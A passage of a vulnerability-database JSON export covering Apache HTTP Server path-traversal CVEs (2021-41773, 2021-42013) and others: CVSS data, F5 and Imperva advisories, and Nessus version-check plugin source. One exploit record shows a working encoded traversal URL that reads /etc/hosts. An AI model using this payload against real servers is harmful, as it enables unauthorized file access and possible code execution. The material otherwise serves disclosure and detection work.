"NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-12T13:45:57", "id": "4E4BAF15-6430-514A-8679-5B9F03584B71", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:45:12", "description": "https://target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts\n\n\n```...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T16:18:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-12T13:45:07", "id": "5D88E443-7AB2-5034-910D-D52A5EFFF5FC", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# POC CVE-2021-41773\n## \n\n[", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-18T00:00:00", "id": "CPAI-2021-0749", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:00", "description": "A remote code execution vulnerability exists in Microsoft Open Management Infrastructure. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Open Management Infrastructure Remote Code Execution (CVE-2021-38647)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-21T00:00:00", "id": "CPAI-2021-0684", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2023-02-08T16:46:19", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. ([CVE-2021-41773](<https://vulners.com/cve/CVE-2021-41773>)) \n \nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. ([CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-21T11:53:00", "type": "f5", "title": "Apache HTTP Server vulnerability CVE-2021-41773, CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T11:53:00", "id": "F5:K04082144", "href": "https://support.f5.com/csp/article/K04082144", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-10-26T20:35:58", "description": "In late September of 2021, a path traversal and file disclosure vulnerability was disclosed and reported as CVE-2021-41773 in Apache HTTP Server version 2.4.29. Both Windows and Linux servers are affected.\n\nThis vulnerability, which occurs via remote code execution (RCE), exposes a path traversal bug and allows attackers to access and read arbitrary files on the server, including sensitive system files, source code, and more. This unauthorized access could not only leak confidential user data, but could provide the information needed to plan more additional zero-day or ransomware attacks in the future and lead to a full system compromise.\n\nOn October 4th, just days after it was originally reported, Apache released a fix with an update to 2.4.50, and urged users to deploy this patch. However upon further investigation, this patch was found to be insufficient resulting in an additional patch bumping the version number to 2.4.51 on October 7th (CVE-2021-42013). It is unclear whether or not the new patch has fully corrected the vulnerability.\n\nLuckily, enterprises that have [RASP protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) installed on their servers already have protections available that prevent Path Traversal attacks, thereby safeguarding systems from vulnerabilities like CVE-2021-42013 and others like it.\n\nTo verify this protection is enabled in the suite of [RASP security protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>), simply navigate to the RASP Management Console and select the desired configuration file. Scroll through the various security protections until reaching the Path Traversal module, then update any settings as desired to adjust the security levels. The updated configuration file can be copied onto the server, and updated protections will be in effect within 60 seconds.\n\nRASP can also be easily installed and configured on additional devices and servers as needed to offer full protection against these vulnerabilities and hackers, as Apache recognizes these vulnerabilities are being actively exploited by bad actors.\n\nFor more information, please contact RASP Technical Support at [support@rasp.imperva.com](<mailto:support@rasp.imperva.com>) or ask for a RASP demo via <https://docs.imperva.com/bundle/rasp-overview/page/73763.htm>\n\nThe post [How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)](<https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {}, "published": "2021-10-26T19:35:24", "type": "impervablog", "title": "How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-26T19:35:24", "id": "IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F", "href": "https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:57:22", "description": "The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies, Fernando Munoz from NULL Life CTF Team, and Shungo Kumasaka", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "nessus", "title": "FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "href": "https://www.tenable.com/plugins/nessus/153983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153983);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\nServer 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n(CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives.\n\nIf files outside of these directories are not protected by the usual\ndefault configuration 'require all denied', these requests can\nsucceed. If CGI scripts are also enabled for these aliased pathes,\nthis could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\nearlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies,\nFernando Munoz from NULL Life CTF Team, and Shungo Kumasaka\");\n # https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c28c816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24>=2.4.49<2.4.51\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:56:07", "description": "According to its banner, the version of Apache running on the remote host is 2.4.49 or 2.4.50. It is, therefore, affected by a path traversal vulnerability. The fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113015", "href": "https://www.tenable.com/plugins/was/113015", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:56:54", "description": "The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a vulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_51.NASL", "href": "https://www.tenable.com/plugins/nessus/153952", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153952);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a\nvulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a\n path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.51 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nvar constraints = [\n { 'min_version' : '2.4.49', 'fixed_version' : '2.4.51' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-12T03:12:04", "description": "A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before 9.511 MR11, 9.6 before 9.607 MR7, and 9.7 before 9.705 MR5. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands on the remote host as the root user.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-09T00:00:00", "type": "nessus", "title": "Sophos SG UTM < 9.511 / 9.6 < 9.607 / 9.7 < 9.705 RCE (CVE-2020-25223)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2023-02-09T00:00:00", "cpe": ["cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*", "x-cpe:2.3:o:sophos:unified_threat_management:*:*:*:*:*:*:*:*"], "id": "SOPHOS_SG_UTM_CVE-2020-25223.NASL", "href": "https://www.tenable.com/plugins/nessus/171238", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(171238);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/09\");\n\n script_cve_id(\"CVE-2020-25223\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Sophos SG UTM < 9.511 / 9.6 < 9.607 / 9.7 < 9.705 RCE (CVE-2020-25223)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Sophos SG UTM is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before 9.511 MR11, \n9.6 before 9.607 MR7, and 9.7 before 9.705 MR5. An unauthenticated, remote attacker can exploit this \nto bypass authentication and execute arbitrary commands on the remote host as the root user.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported \nversion number.\");\n # https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?76b91a1f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Sophos UTM version 9.511, 9.607, or 9.705 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25223\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sophos UTM WebAdmin SID Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", 